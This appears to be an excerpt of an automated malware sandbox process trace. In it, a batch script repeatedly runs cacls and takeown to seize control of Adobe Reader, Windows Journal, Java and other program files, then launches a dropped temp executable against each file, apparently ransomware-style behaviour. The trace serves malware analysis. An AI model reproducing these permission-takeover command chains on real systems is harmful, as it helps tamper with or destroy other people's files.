C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ENUtxt.pdf" -nobanner3⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ENUtxt.pdf" -nobanner4⤵PID:1996
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1176
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "classes.jsa" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "classes.jsa" -nobanner4⤵PID:1332
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui" /E /G Admin:F /C3⤵PID:1584
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:472
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵PID:624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Memo.jtp" -nobanner3⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Memo.jtp" -nobanner4⤵PID:860
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:1332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "WinMail.exe" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:1492
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵
- Modifies file permissions
PID:1020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "license.html" -nobanner3⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "license.html" -nobanner4⤵PID:1256
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵
- Modifies file permissions
PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:1824
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵
- Modifies file permissions
PID:232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "forms_received.gif" -nobanner3⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "forms_received.gif" -nobanner4⤵PID:1176
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:1112
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:1808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:1980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "submission_history.gif" -nobanner3⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "submission_history.gif" -nobanner4⤵PID:1796
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Identity-H" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Identity-H" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1120
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:672
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:1980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:1784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:1332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "brt32.clx" -nobanner3⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "brt32.clx" -nobanner4⤵PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:1136
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵
- Modifies file permissions
PID:1432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "usa.fca" -nobanner3⤵PID:672
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "usa.fca" -nobanner4⤵PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:1796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:1228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:972
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:1020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:1120
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:528
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "device.png" -nobanner3⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "device.png" -nobanner4⤵PID:1824
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1584
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵PID:1684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:1832
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵PID:360
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵PID:660
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"3⤵
- Modifies file permissions
PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "LogTransport2.exe" -nobanner3⤵PID:624
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "LogTransport2.exe" -nobanner4⤵PID:2040
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "bl.gif" -nobanner3⤵PID:976
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "bl.gif" -nobanner4⤵PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:1808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "forms_super.gif" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1556
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "review_browser.gif" -nobanner3⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula "review_browser.gif" -nobanner4⤵PID:1408
-
-
-
C:\Users\Admin\AppData\Local\Temp\RzKn8STp.exeRzKn8STp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\G045XYT6.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵
- Modifies file permissions
PID:1136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c RzKn8STp.exe -accepteula "tl.gif" -nobanner3⤵PID:1584
-
